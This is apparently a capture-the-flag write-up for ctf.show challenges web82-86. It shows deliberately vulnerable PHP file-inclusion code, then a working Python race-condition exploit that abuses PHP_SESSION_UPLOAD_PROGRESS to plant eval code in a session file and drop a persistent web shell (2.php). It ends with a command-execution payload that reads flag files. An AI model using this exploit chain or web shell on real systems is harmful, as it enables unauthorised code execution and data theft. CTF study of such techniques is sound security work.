web82-86
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 19:34:45
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
// Challenge entry point (web82-86): the `file` query parameter goes straight into
// include() after a substring denylist. This listing is intentionally vulnerable CTF code.
if(isset($_GET['file'])){
    $file = $_GET['file'];
    // Denylist: the substrings "php", "data", ":" and "." are rewritten to "???",
    // which breaks stream wrappers such as php:// and data:, and any dotted file name.
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    // NOTE(review): a str_replace denylist is not a safe control for include(). An absolute
    // path without any of the replaced substrings (the writeup below uses the PHP session
    // save file under /tmp/sess_<id>) passes untouched. The defensive fix is an allowlist of
    // permitted include targets, never a user-controlled path; on the PHP side the session
    // upload-progress feature can also be turned off (session.upload_progress.enabled=Off)
    // when it is not needed, which removes the attacker-writable file this chain relies on.
    include($file);
}else{
    highlight_file(__FILE__);
}
这题使用到了PHP_SESSION_UPLOAD_PROGRESS这个参数,这个参数是为了实时获得文件上传的进度的,即使没有开启session,只要我们上传的cookie里带有PHPSESSID,它就会在默认目录生成对应文件/tmp/sess_xxxxx,这样我们就可以控制文件名字;控制文件内容我们就需要使用PHP_SESSION_UPLOAD_PROGRESS。如果PHP_SESSION_UPLOAD_PROGRESS=>"123"->/tmp/sess_xxx->123。
直接使用脚本
import io,threading,requests
# Challenge instance used in the writeup (per-instance hostname, copied from the page).
url: str = 'http://bb5282b9-dc00-44d5-98f0-1c93ed240d67.challenge.ctf.show:8080/'
# Value sent as the PHPSESSID cookie; PHP names the session file /tmp/sess_<this value>.
sessionid: str = 'test'
# Form body that read() POSTs along with the include request; key '1' is the parameter
# the planted session-file content reads (see write()).
data: dict[str, str] = {
    '1': 'file_put_contents("/var/www/html/2.php","<?php eval(\$_POST[2]);?>");'
}
def write(session: requests.Session) -> None:
    """Writer thread: keeps sending multipart uploads carrying the
    PHP_SESSION_UPLOAD_PROGRESS form field so that PHP's upload-progress
    tracking repeatedly writes the session file for cookie PHPSESSID=sessionid.

    Runs forever (``while 1`` with no break); the process must be killed
    externally. Reads the module globals ``url`` and ``sessionid``.
    """
    while 1:
        # 500 KiB of dummy bytes as the uploaded file; presumably chosen so each
        # request takes long enough for the race in read() to land — not verified here.
        fileBytes = io.BytesIO(b'a'*1024*500)
        response = session.post(url, data={
            # Recorded by PHP into the session file (upload-progress tracking),
            # which is how the file content becomes request-controlled.
            "PHP_SESSION_UPLOAD_PROGRESS": "<?php eval($_POST[1]);?>"
        },
        cookies={
            'PHPSESSID': sessionid
        },
        files={
            'file': ('test.jpg', fileBytes)
        })
        # print(response.text)
def read(session: requests.Session) -> None:
    """Reader thread: races the writers by asking the challenge to include the
    session file, then polls for 2.php and prints the HTTP status of each poll.

    Runs forever; nothing breaks the loop even after "done" is printed.
    Reads the module globals ``url``, ``sessionid`` and ``data``.
    """
    while 1:
        # The response body is never used; only the server-side effect of the
        # include matters here.
        response = session.post(url + '?file=/tmp/sess_' + sessionid, data=data,
                                cookies={
                                    'PHPSESSID': sessionid
                                })
        # 200 here means 2.php now exists on the target.
        response2 = session.get(url + '2.php')
        if response2.status_code == 200:
            print("+++++++++++done+++++++++++")
        else:
            print(response2.status_code)
if __name__ == '__main__':
    # NOTE(review): `event` is created and set but never waited on anywhere, so it
    # has no effect on the threads; write()/read() loop forever regardless.
    event = threading.Event()
    with requests.session() as session:
        # Five writer and five reader threads all share the one Session object.
        for i in range(5):
            threading.Thread(target=write, args=(session,)).start()
        for i in range(5):
            threading.Thread(target=read, args=(session,)).start()
        event.set()
然后访问2.php,payload2=system('tac f*.php');
就可以了